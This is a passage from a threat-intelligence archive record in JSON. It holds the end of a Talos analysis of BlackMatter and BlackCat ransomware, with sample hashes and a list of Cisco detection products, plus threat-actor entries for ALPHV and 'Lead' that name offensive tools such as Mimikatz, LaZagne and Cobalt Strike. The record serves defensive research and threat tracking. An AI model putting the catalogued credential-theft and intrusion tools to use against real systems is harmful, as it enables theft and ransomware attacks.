ransomware:\r\n060CA3F63F38B7804420729CDE3FC30D126C2A0FFC0104B8E698F78EDAB96767\r\nHashes - BlackMatter:\r\nBlackMatter ransomware:\r\n706F3EEC328E91FF7F66C8F0A2FB9B556325C153A329A2062DC85879C540839D\r\nCoverage\r\nWays our customers can detect 
and block this threat are listed below.\r\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware\r\ndetailed in this post.\r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat\r\nDefense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this\r\nthreat.\r\nCisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically\r\nand alerts users of potentially unwanted activity on every connected device.\r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco\r\nSecure products.\r\nUmbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and\r\nURLs, whether users are on or off the corporate network.\r\nAdditional protections with context to your specific environment and threat data are available from the Firewall\r\nManagement Center.\r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on Snort.org.\r\nOrbital Queries\r\nCisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints\r\nare infected with this specific threat.\r\nSource: https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MITRE",
		"ETDA"
	],
	"references": [
		"https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html"
	],
	"report_names": [
		"from-blackmatter-to-blackcat-analyzing.html"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "6e23ce43-e1ab-46e3-9f80-76fccf77682b",
			"created_at": "2022-10-25T16:07:23.303713Z",
			"updated_at": "2026-04-10T02:00:04.530417Z",
			"deleted_at": null,
			"main_name": "ALPHV",
			"aliases": [
				"ALPHV",
				"ALPHVM",
				"Ambitious Scorpius",
				"BlackCat Gang",
				"UNC4466"
			],
			"source_name": "ETDA:ALPHV",
			"tools": [
				"ALPHV",
				"ALPHVM",
				"BlackCat",
				"GO Simple Tunnel",
				"GOST",
				"Impacket",
				"LaZagne",
				"MEGAsync",
				"Mimikatz",
				"Munchkin",
				"Noberus",
				"PsExec",
				"Remcom",
				"RemoteCommandExecution",
				"WebBrowserPassView"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434563,
	"ts_updated_at": 1775791780,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4a288f83b64e007445b90bd303be7bc5d9751d68.pdf",
		"text": "https://archive.orkl.eu/4a288f83b64e007445b90bd303be7bc5d9751d68.txt",
		"img": "https://archive.orkl.eu/4a288f83b64e007445b90bd303be7bc5d9751d68.jpg"
	}
}